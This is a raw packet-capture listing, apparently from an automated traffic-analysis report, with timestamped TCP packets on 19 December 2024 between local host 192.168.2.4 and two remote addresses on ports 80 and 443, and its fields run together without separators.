                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.034456968 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.034503937 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.034977913 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.035027027 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.035578012 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.035593033 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.035605907 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.035644054 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.035675049 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.036874056 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.036890984 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.036921024 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.036938906 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.037606955 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.038856983 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.038913965 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.039601088 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.039614916 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.039628983 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.039654970 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.039680004 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.042012930 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.042037010 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.042051077 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.042062998 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.042088985 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.042102098 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.043066978 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.043085098 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.043097973 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.043111086 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.043129921 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.043159962 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.043730021 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.044670105 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.045187950 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.045201063 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.045249939 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.045768023 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.045780897 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.045830965 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.047199011 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.047287941 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.047919989 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.047946930 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.047959089 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.048001051 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.048001051 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.048676014 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.048723936 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.049226046 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.049238920 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.049252987 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.049269915 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.049300909 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.049330950 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.049871922 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.049886942 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.049918890 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.049935102 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.068119049 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.068203926 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.068300962 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.068317890 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.068361044 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.068751097 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.068814039 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.068991899 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.069004059 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.069050074 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.069417953 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.069578886 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.069581985 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.069711924 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.069725990 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.069756031 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.069783926 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.070108891 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.070358992 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.070370913 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.070391893 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.070424080 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.070453882 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.070955038 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.070967913 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.070981026 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.071013927 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.071043968 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.071623087 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.071696043 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.071844101 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.071856976 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.071955919 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.072293043 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.072310925 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.072359085 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.072387934 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.072788000 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.072801113 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.072818041 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.072871923 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.073550940 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.073569059 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.073584080 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.073617935 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.073642015 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.074295044 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.074315071 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.074379921 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.074600935 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.074613094 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.074629068 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.074656010 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.074693918 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.075383902 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.075398922 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.075411081 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.075469017 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.075495958 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.075495958 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.076103926 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.076121092 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.076160908 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.076178074 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.076419115 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.076431036 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.076445103 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.076502085 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.077181101 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.077199936 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.077213049 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.077238083 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.077255011 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.077908039 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.077924967 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.077967882 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.078258038 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.078269958 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.078283072 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.078314066 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.078345060 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.079081059 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.079099894 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.079113960 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.079134941 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.079154968 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.079761982 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.079777002 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.079790115 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.079802990 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.079835892 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.079853058 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.080583096 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.080598116 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.080612898 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.080640078 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.080657959 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.081353903 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.081367970 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.081379890 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.081423998 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.081439972 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.081885099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.081899881 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.081912994 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.081968069 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.081968069 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.082746983 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.082782984 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.082794905 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.082842112 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.120395899 CET44349755104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.120523930 CET49755443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.121951103 CET49755443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.121958017 CET44349755104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.122217894 CET44349755104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.130646944 CET49755443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.130876064 CET49755443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.130909920 CET44349755104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.131014109 CET49755443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.131022930 CET44349755104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.223732948 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.223803997 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.223820925 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.223838091 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.223881006 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.224406958 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.224582911 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.224642992 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.224656105 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.224697113 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.225071907 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.225131989 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.227338076 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.227355003 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.227366924 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.227379084 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.227417946 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.227442980 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.227978945 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.227992058 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.228004932 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.228054047 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.228619099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.230067015 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.230082035 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.230125904 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.230144978 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.230742931 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.230756998 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.230788946 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.230813026 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.232842922 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.233786106 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.233799934 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.233813047 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.233856916 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.233891010 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.235806942 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.235824108 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.235836029 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.235848904 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.235877991 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.235912085 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.236622095 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.236640930 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.236655951 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.236673117 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.236689091 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.236705065 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.237409115 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.237461090 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.239530087 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.239548922 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.239562035 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.239593983 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.239638090 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.240283966 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.241058111 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.241086006 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.241099119 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.241115093 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.241134882 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.241163015 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.241801977 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.241818905 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.241863012 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.241900921 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.260252953 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.260277987 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.260294914 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.260312080 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.260333061 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.260550976 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.260600090 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.260801077 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.260818005 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.260859013 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.261274099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.261323929 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.261492014 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.261533976 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.261693001 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.261707067 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.261748075 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.261748075 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.262166023 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.262423038 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.262444973 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.262470961 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.262497902 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.262859106 CET804974331.41.244.11192.168.2.4
